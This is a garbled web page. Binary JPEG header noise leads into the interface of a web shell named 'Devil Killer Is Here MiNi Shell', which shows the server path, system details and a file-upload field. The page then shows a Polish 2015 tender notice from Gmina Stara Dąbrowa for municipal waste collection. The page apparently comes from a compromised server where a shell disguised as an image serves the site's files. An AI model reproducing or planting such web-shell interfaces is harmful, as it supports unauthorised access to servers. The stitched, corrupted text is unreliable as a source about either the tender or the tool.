JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151209/335950-N-2015.html

<p class="kh_header"><b>Stara Dąbrowa: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Stara Dąbrowa.</b><br>
<b>Numer ogłoszenia: 335950 - 2015; data zamieszczenia: 09.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Dąbrowa , 20, 73-112 Stara Dąbrowa, woj. zachodniopomorskie, tel. 0-91 5739820, 5739832, faks 0-91 5739822.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Stara Dąbrowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zamówienia publicznego pod nazwą:Odbieranie i zagospodarowanie odpadów komunalnych od właściciel nieruchomości zamieszkałych na terenie Gminy Stara Dąbrowa  polegającego na świadczeniu przez Wykonawcę następujących usług:
1) Odbieranie i zagospodarowanie wskazanych w opisie przedmiotu zamówienia rodzajów odpadów komunalnych z nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie Gminy Stara Dąbrowa, z pojemników będących własnością właścicieli nieruchomości.
2) Odbiór odpadów komunalnych od właścicieli nieruchomości odbywać się będzie z  podziałem na:
 a) niesegregowane (zmieszane) odpady komunalne (kod 20 03 01)
 b) odpady komunalne selektywnie zbierane w pojemnikach do segregacji w punktach zbiórki: 
- opakowania z papieru i tektury oraz papier i tektura (kody: 15 01 01, 20 01 01)
- opakowania ze szkła i szkło (kody: 15 01 07, 20 01 02) 
- opakowania z tworzyw sztucznych oraz tworzywa sztuczne (kody: 15 01 02, 20 01 39)
c) odpady wielkogabarytowe (20 03 07)
e) odpady komunalne nie wymienione w innych grupach (20 03 99)
f) odpady remontowe i rozbiórkowe powstałe w gospodarstwach domowych (17 01 01, 17 01 02, 17 01 80)
3) System odbierania odpadów komunalnych nie obejmuje odbierania odpadów komunalnych od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy, a powstają odpady komunalne.
4) Zakres przedmiotu zamówienia obejmuje transport odebranych odpadów komunalnych do instalacji mechaniczno-biologicznego przetwarzania odpadów komunalnych  określoną w Planie Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012-2017 z uwzględnieniem perspektywy na lata 2018-2013. W niniejszej Specyfikacji Istotnych Warunków Zamówienia kody odpadów podano zgodnie z rozporządzeniem Ministra Środowiska z dnia 9 grudnia 2014 r. w sprawie katalogu odpadów (Dz. U. z 2014 r. poz. 1923).
4.Charakterystyka Gminy Stara Dąbrowa.
1) Powierzchnia gminy: 112, 59 km2
2) Liczba osób zameldowanych w gminie na dzień 25.11.2015 r. - 3707, przy czym liczba osób faktycznie zamieszkujących może się różnić o ok. 15 %.
3) Miejscowości znajdujące się w granicach administracyjnych gminy Stara Dąbrowa:
 Białuń, Chlebowo, Chlebówko, Kicko, Krzywnica, Łęczówka, Łęczyca, Łęczyna, Moskorze, Parlino, Nowa Dąbrowa, Rokicie, Rosowo, Stara Dąbrowa, Storkówko, Wiry, Załęcze.
4) Ilości odpadów komunalnych odebrana z terenu gminy Stara Dąbrowa od  01 listopada 2014r. do 31 października   2015 r. :
a)niesegregowane ( zmieszane ) odpady komunalne kod 20 03 01-502,68 Mg
b)Opakowania z tworzyw sztucznych kod 15 01 02 - 25,06 Mg d)Papier -7,72 Mg
e)Odpady wielkogabarytowe -7,72 Mg c) Opakowania ze szkła  kod 15 01 07- 55,21 Mg
5.Szczegółowy opis przedmiotu zamówienia.
1.Niesegregowane (zmieszane) odpady komunalne - kod 20 03 01.
Niesegregowane (zmieszane) odpady komunalne odbierane będą z pojemników o pojemności 120l i 240l, ustawionych na terenie nieruchomości zamieszkałych, w przeznaczonych do tego celu miejscach z bezpośrednim dostępem dla załogi odbierającej odpady. Pojemniki zapewnia właściciel nieruchomości.
Wykonawca na wniosek i koszt właściciela nieruchomości może dostarczyć i ustawić pojemniki o odpowiedniej pojemności, w jednolitym kolorze, w miejscach wskazanych przez właściciela nieruchomości.  Częstotliwość wywozu - opróżnianie pojemników przez Wykonawcę następować będzie 1 raz w miesiącu, zgodnie z harmonogramem wywozu sporządzonym przez Wykonawcę i uzgodnionym z Zamawiającym.                                                                                        Zamawiający przewiduje możliwość zmiany w trakcie realizacji zamówienia ilości pojemników na niesegregowane odpady komunalne do 10 %  łącznej ilości pojemników ( w przeliczeniu na sztuki). O każdej tego typu zmianie Wykonawca zostanie poinformowany na piśmie przez Zamawiającego. Zamawiający dostarczy Wykonawcy szczegółowy wykaz adresów nieruchomości objętych umową odbioru odpadów oraz wykaz punktów gromadzenia odpadów, które będą stanowiły załącznik do umowy. 
6. Selektywnie zbierane odpady komunalne (odpady segregowane) o kodach:
- 15 01 01  - opakowania z papieru i tektury,
- 20 01 01  - papier i tektura,
- 15 0102   - opakowania z tworzyw sztucznych,
- 20 01 39  - tworzywa sztuczne,
- 15 01 07  - opakowania ze szkła,
- 20 01 02  - szkło. 
Selektywna zbiórka odpadów komunalnych na terenie całej gminy Stara Dąbrowa odbywać się będzie w pojemnikach odpowiednio:
a) pojemnik siatkowy o poj. 2,5 m3 - odpady opakowaniowe z tworzyw sztucznych i tworzywa sztuczne,
b) pojemnik dwukomorowy (dzwon) w kolorze biało-zielonym o poj. 2,5 m3 - szkło i odpady opakowaniowe ze szkła,
c) pojemnik w kolorze niebieskim (dzwon) o poj. 2,5   m3- odpady z papieru i tektury, opakowania z papieru i tektury. Pojemniki rozmieszczone będą w ogólnodostępnych punktach zlokalizowanych na terenie gminy Stara Dąbrowa wg tabeli nr 3.
Częstotliwość wywozu - opróżnianie pojemników przez Wykonawcę następować będzie minimum 1 raz w miesiącu, na telefon Zamawiającego nie więcej niż 20 razy w roku zgodnie z harmonogramem wywozu sporządzonym przez Wykonawcę i uzgodnionym z Zamawiającym. Zamawiający przewiduje możliwość zmiany w trakcie realizacji zamówienia ogólnej ilości pojemników do segregacji na odpady komunalne zbierane w sposób selektywny w punktach zbiórki (szkło + plastik + papier), do 20 % (w przeliczeniu na sztuki).
7. Odpady remontowe i rozbiórkowe powstające w gospodarstwach domowych (kody 17 01 01, 17 01 02, 17 01 80) będą odbierane od właścicieli nieruchomości według zasad określonych w § 3 pkt 6 lit b uchwały Nr XXII/147/2012 Rady Gminy Stara Dąbrowa z dnia 28 grudnia 2012 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Stara Dąbrowa (Dz. Urz. Woj. Zachodniopom.  z 2013 r., poz. 656 ze zm.).
8. Na odpady zbierane  w  punkcie selektywnej zbiórki odpadów komunalnych (PSZOK) będzie zawarta odrębna umowa.
9. Obowiązki Wykonawcy  i Zamawiającego przed rozpoczęciem oraz w trakcie realizacji zamówienia.
1) W dniu podpisania umowy na realizację zamówienia Zamawiający dostarczy Wykonawcy szczegółowy wykaz punktów odbioru odpadów komunalnych z nieruchomości objętych umową odbioru odpadów oraz miejsc do gromadzenia odpadów- wg deklaracji złożonych przez właścicieli nieruchomości.
2) Zamawiający dostarczy pojemniki do selektywnej zbiórki w oparciu o wykaz zawarty w tabeli nr 3 - Rozmieszczenie i ilość pojemników do selektywnej zbiórki, przed pierwszym dniem obowiązywania umowy na odbiór i zagospodarowanie odpadów zawartej z Zamawiającym. 
3) Wykonawca jest zobowiązany do wykonania harmonogramu odbioru odpadów komunalnych na terenie gminy Stara Dąbrowa i uzgodnienia go z Zamawiającym przed podpisaniem umowy. Przy sporządzaniu harmonogramu wykonawca musi uwzględnić listę punktów wywozowych, o której mowa w pkt 1), częstotliwość odbioru odpadów w poszczególnych miejscowościach, listę punktów wywozowych , o której mowa w tabeli nr 3 oraz częstotliwość odbioru selektywnie zebranych odpadów komunalnych. Harmonogram opracowany przez Wykonawcę wymaga akceptacji przez Zamawiającego najpóźniej w dniu podpisania umowy.
4) Zamawiający i Wykonawca wspólnie odpowiadają za informowanie mieszkańców o zasadach i terminach odbierania poszczególnych rodzajów odpadów. Opracowany przez Wykonawcę i zaakceptowany przez Zamawiającego harmonogram, Zamawiający będzie publikował na stronie internetowej www.staradabrowa.pl, a Wykonawca w formie wydruków, będzie zobowiązany przekazać właścicielom nieruchomości podczas pierwszego odbioru odpadów.
5)  Wykonawca zobowiązany jest do przedkładania Zamawiającemu półrocznych  sprawozdań, zgodnych z art. 9n z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (j. t. Dz. U. z 2013 r. poz. 1399 ze zm.) na wzorach sprawozdań określonych w Rozporządzeniu Ministra Środowiska wydanym na podstawie art. 9t ww. ustawy.
6) Wykonawca odpowiada, także za stan sanitarny  i techniczny pojemników wymienionych w tabeli nr 3, przeznaczonych do selektywnego zbierania odpadów komunalnych. Wykonawca zobowiązany jest na własny koszt do ich mycia, dezynfekcji oraz  naprawy, a w przypadku  stwierdzenia uszkodzenia z przyczyn niezależnych od Zamawiającego, które nie da się naprawić, do wymiany tych pojemników na nowe. Zamawiający przewiduje mycie pojemników przeznaczonych do selektywnego zbierania odpadów komunalnych jeden raz na 6 miesięcy.
7) Wykonawca jest zobowiązany do zebrania także odpadów leżących obok pojemników do selektywnego zbierania odpadów komunalnych (papier+ szkło+ plastyk).
8) Wykonawca podczas odbioru zmieszanych odpadów komunalnych z nieruchomości zamieszkałych z terenu Gminy Stara Dąbrowa, będzie sprawdzał zawartość pojemników na w/w odpady. W przypadku stwierdzenia znacznych ilości (powyżej 10%) odpadów frakcji zbieranych selektywnie, będzie na bieżąco informował Zamawiającego. Raporty z w/w czynności Wykonawca dostarcza w ciągu 10 dni roboczych po przeprowadzonej kontroli i podaje w nim informacje: jakie nieruchomości sprawdzono i na jakich nieruchomościach stwierdzono obecność odpadów zbieranych selektywnie w pojemnikach na zmieszane odpady komunalne, podając adres nieruchomości, datę przeprowadzonej kontroli oraz dokumentacje fotograficzną lub video.
9) Zabrania się pojazdom Wykonawcy w trakcie realizacji usługi odbioru odpadów komunalnych realizowanych na rzecz Zamawiającego, jednoczesnego odbierania odpadów komunalnych z nieruchomości niezamieszkałych, które nie są objęte gminnym systemem gospodarowania odpadami. 
10) Odpady komunalne stanowiące przedmiot zamówienia zebrane z terenu gminy Stara Dąbrowa, Wykonawca zobowiązany jest zagospodarować (poddać odzyskowi lub unieszkodliwieniu) zgodnie z obowiązującym prawem, w tym zmieszane odpady komunalne, odpady ulegające biodegradacji oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania przekazywać do regionalnych instalacji do przetwarzania odpadów komunalnych oraz przedstawić Zamawiającemu (jeden raz w miesiącu, razem z fakturą) dowody potwierdzające wykonanie tych czynności, tj. karty przekazania odpadów, wraz z kopiami kwitów wagowych , potwierdzających datę i wagę odpadów komunalnych przyjętych z tego tytułu.
11) zgodnie z art.6d ust.4 pkt.5 Ustawy o utrzymaniu czystości i porządku w gminach, Wykonawca musi wskazać regionalne instalacje do przetwarzania odpadów komunalnych do których podmiot odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany przekazać odebrane odpady. Instalacje mechaniczno-biologicznego przetwarzania odpadów komunalnych  określone są w (Planie Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012-2017 z uwzględnieniem perspektywy na lata 2018-2013)
12) za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru odpadów odpowiedzialność ponosi Wykonawca.
13) Wykonawca zobowiązany jest do przestrzegania obowiązujących w trakcie trwania umowy przepisów prawnych, a w szczególności:
a) ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.),
b) ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r., poz. 1399, ze zm.),
c) uchwały nr XXII/147/2012 Rady Gminy Stara Dąbrowa z dnia 28 grudnia 2012 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Stara Dąbrowa (Dz. Urz. Woj. Zachodniopom. z 2013 r. poz. 656 ze zm.),
d) uchwały nr XXIV/171/2012 Rady Gminy Stara Dąbrowa z dnia 28 marca 2013 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi (Dz. Urz. Woj. Zachodniopom. z 2013 r. poz. 1884),
e) uchwały nr XVI/218/12 Sejmiku Województwa Zachodniopomorskiego z dnia 29 czerwca 2012 r. w sprawie w uchwalenia aktualizacji Planu Gospodarki Odpadami dla Województwa Zachodniopomorskiego na lata 2012-2017 z uwzględnieniem perspektywy na lata 2018-2023 (Dz. Urz. Woj. Zachodniopom. z 2012 r. poz. 1873 ze zm.)
10. Dla potrzeb złożenia oferty Zamawiający szacuje łączną masę odpadów komunalnych do odbioru i zagospodarowania z terenu nieruchomości zamieszkałych na poziomie:Rodzaj odpadów -Szacowana ilość odpadów w ciągu  miesięcy trwania umowy [Mg]
-Zmieszane odpady komunalne	ok. 513
-Odpady komunalne gromadzone w sposób selektywny (papier + szkło + plastik)	
ok. 90
-Odpady wielkogabarytowe ok. 7
Ustalone ilości odpadów  są szacunkowe, a ich faktyczna  ilość w czasie realizacji zamówienia może różnić się od wartości szacunkowych przedstawionych w w/ tabeli, do ? 10%. Zamawiający zaleca dokonanie przez Wykonawcę wizji lokalnej terenu gminy w  celu zlokalizowania zakresu usług..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.12.00-4, 90.51.13.00-5, 90.51.20.00-9, 90.53.30.00-2, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium. 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 15 000, 00 zł 
(słownie zł: piętnaście tysięcy 00/100).
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
a) w pieniądzu, przelewem na rachunek bankowy: 
Bank PKO BP S.A. w Stargardzie Szczecińskim
Nr 39 1020 4867 0000 1502 0007 9905
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
c) w gwarancjach bankowych, 
d) w gwarancjach ubezpieczeniowych,
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 
4. Sposób przekazania wadium - dokument potwierdzający wniesienie wadium należy dołączyć do oferty.
5. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego. 
6. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
7. W przypadku nie zabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zezwolenie na zbieranie i transport odpadów ( zgodnie z art.41 ustawy z dnia 14 grudnia 2012 r. o odpadach- Dz. U. z 2013 r., poz. 21 ze zm.) o kodach: 20 03 01, 15 01 01, 20 01 01, 15 01 01, 20 01 01, 20 03 99,15 01 07, 20 01 02, 15 01 02, 20 01 39, 20 03 07, 17 01 01, 17 01 02, 17 01 80.
b) zaświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości  z terenu Gminy Stara Dąbrowa, wydane przez Wójta Gminy Stara Dąbrowa.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę główną. Za usługę główną Zamawiający uzna usługę odbioru i zagospodarowania lub przekazania do zagospodarowania odpadów komunalnych zmieszanych oraz odpadów komunalnych gromadzonych w sposób selektywny, z których każda była wykonana na rzecz właścicieli nieruchomości lub gmin, w sposób ciągły przez okres co najmniej 12 miesięcy, która to usługa lub usługi obejmowały odbiór i zagospodarowanie odpadów komunalnych zmieszanych o łącznej masie minimum 500 Mg.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował wyposażeniem umożliwiającym odbieranie odpadów komunalnych od właścicieli nieruchomości w ilości co najmniej:
a) dwoma pojazdami specjalistycznymi przystosowanymi do odbioru zmieszanych odpadów komunalnych, oraz b) dwoma pojazdami  przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, oraz c) jednym pojazdem przystosowanym do odbierania odpadów bez funkcji kompaktującej,oraz
d) jednym pojazdem do odbierania kontenerów przystosowanych do transportu wozami hakowymi i bramowymi,oraz e) - jedną bazą magazynowo- transportową położoną na terenie gminy lub w odległości nie większej niż 60 km od granicy gminy do której posiada tytuł prawny spełniająca wymogi określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ( Dz. U. z 2013 r., poz. 122),  i rozporządzeniu Ministra Środowiska z dnia 16 czerwca 2009 r. w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi ( Dz. U. z 2009 r. Nr 104, poz.868),- pojazdy do odbierania odpadów muszą być odpowiednio oznakowane logo firmy i spełniać kryterium emisji spalin min. na poziomie nory euro3.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca złoży stosowne oświadczenie.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony, jeżeli Wykonawca przedstawi Zamawiającemu, opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości, co najmniej równej wartości przedmiotowego zamówienia, nie mniej niż 500 000, 00 zł (słownie zł: pięćset tysięcy 00/100). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

